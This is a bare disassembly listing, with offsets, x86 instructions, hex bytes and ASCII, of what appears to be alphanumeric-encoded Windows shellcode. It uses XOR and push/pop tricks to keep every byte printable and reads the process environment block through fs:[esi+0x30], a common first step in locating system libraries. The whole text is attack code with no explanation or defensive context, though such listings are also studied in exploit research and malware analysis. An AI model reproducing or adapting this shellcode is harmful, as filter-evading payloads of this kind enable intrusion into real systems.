0x0        push 0x30                           \x6a\x30                  j0        
0x2        pop eax                             \x58                      X         
0x3        xor al, 0x30                        \x34\x30                  40        
0x5        push eax                            \x50                      P         
0x6        push esi                            \x56                      V         
0x7        push esp                            \x54                      T         
0x8        pop ecx                             \x59                      Y         
0x9        xor esi, dword ptr ss:[ecx]         \x36\x33\x31              631       
0xc        xor eax, dword ptr fs:[esi + 0x30]  \x64\x33\x46\x30          d3F0      
0x10       xor al, 0x6d                        \x34\x6d                  4m        
0x12       xor al, 0x61                        \x34\x61                  4a        
0x14       xor esi, dword ptr [eax]            \x33\x30                  30        
0x16       push esi                            \x56                      V         
0x17       pop eax                             \x58                      X         
0x18       push esi                            \x56                      V         
0x19       push esp                            \x54                      T         
0x1a       pop ecx                             \x59                      Y         
0x1b       xor esi, dword ptr ss:[ecx]         \x36\x33\x31              631       
0x1e       push esi                            \x56                      V         
0x1f       xor al, 0x50                        \x34\x50                  4P        
0x21       xor al, 0x4c                        \x34\x4c                  4L        
0x23       xor esi, dword ptr [eax]            \x33\x30                  30        
0x25       pop eax                             \x58                      X         
0x26       push eax                            \x50                      P         
0x27       push esi                            \x56                      V         
0x28       pop eax                             \x58                      X         
0x29       push esi                            \x56                      V         
0x2a       push esp                            \x54                      T         
0x2b       pop ecx                             \x59                      Y         
0x2c       xor esi, dword ptr ss:[ecx]         \x36\x33\x31              631       
0x2f       push esi                            \x56                      V         
0x30       xor esi, dword ptr [eax]            \x33\x30                  30        
0x32       push esi                            \x56                      V         
0x33       pop eax                             \x58                      X         
0x34       push esi                            \x56                      V         
0x35       push esp                            \x54                      T         
0x36       pop ecx                             \x59                      Y         
0x37       xor esi, dword ptr ss:[ecx]         \x36\x33\x31              631       
0x3a       push esi                            \x56                      V         
0x3b       xor al, 0x58                        \x34\x58                  4X        
0x3d       xor al, 0x50                        \x34\x50                  4P        
0x3f       xor esi, dword ptr [eax]            \x33\x30                  30        
0x41       push esi                            \x56                      V         
0x42       pop eax                             \x58                      X         
